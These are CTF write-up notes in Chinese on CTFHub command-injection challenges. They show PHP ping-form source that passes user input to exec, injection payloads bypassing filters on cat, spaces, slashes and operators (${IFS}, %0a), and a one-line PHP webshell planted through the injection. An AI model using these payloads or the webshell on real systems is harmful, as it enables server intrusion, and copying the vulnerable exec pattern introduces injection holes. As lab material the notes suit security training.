命令注入
127.0.0.1&ls
127.0.0.1&cat 109131856411048.php
过滤了cat命令之后,你还有什么方法能读到 Flag?
127.0.0.1&ls
127.0.0.1&less flag_2881947412234.php
127.0.0.1&more flag_2881947412234.php
127.0.0.1&head flag_2881947412234.php
127.0.0.1&tail flag_2881947412234.php
127.0.0.1&nl flag_2881947412234.php
显示文本命令大全(cat, tac, more,less,head,tail,nl,od)
参考:
https://wenku.baidu.com/view/3f777043482fb4daa58d4b8b.html
这次过滤了空格,你能绕过吗
127.0.0.1&ls
flag_9256370613409.php
127.0.0.1&cat${
IFS}flag*
127.0.0.1&cat$IFS$9flag*
参考:【能用的只有上面两个】
https://blog.csdn.net/weixin_43921596/article/details/86638919
linux操作系统-空格字符表示法
空格可以用:\x00[但是这种没成功]
CTFHub 命令注入-过滤目录分隔符
127.0.0.1&ls
127.0.0.1&ls \flag_is_here
方法
127.0.0.1&echo '<?php eval($_REQUEST[1]);?>' >1.php//1.直接写木马,连接webshell
127.0.0.1&cd flag_is_here;cat flag_21670324169762.php//2.切换目录查看
源代码
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/\//", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
CTFHub 命令注入-过滤运算符
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/(\||\&)/", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
算术运算符 & | 绕过
0a绕过[回车]
这里就只能用url了
http://challenge-a1b075782f13059e.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als#
flag_1704301055765.php
http://challenge-a1b075782f13059e.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acat flag_1704301055765.php#
CTFHub 命令注入-综合练习
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
利用%0a绕过& ;
${IFS}绕过空格
fla* 不用知道flag的具体名字
http://challenge-0cdf9142eb7b7999.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als#
flag_is_here
http://challenge-0cdf9142eb7b7999.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd${
IFS}fla*%0aless${
IFS}fla*#
vim泄露 swp
以后有空再做个详细总结吧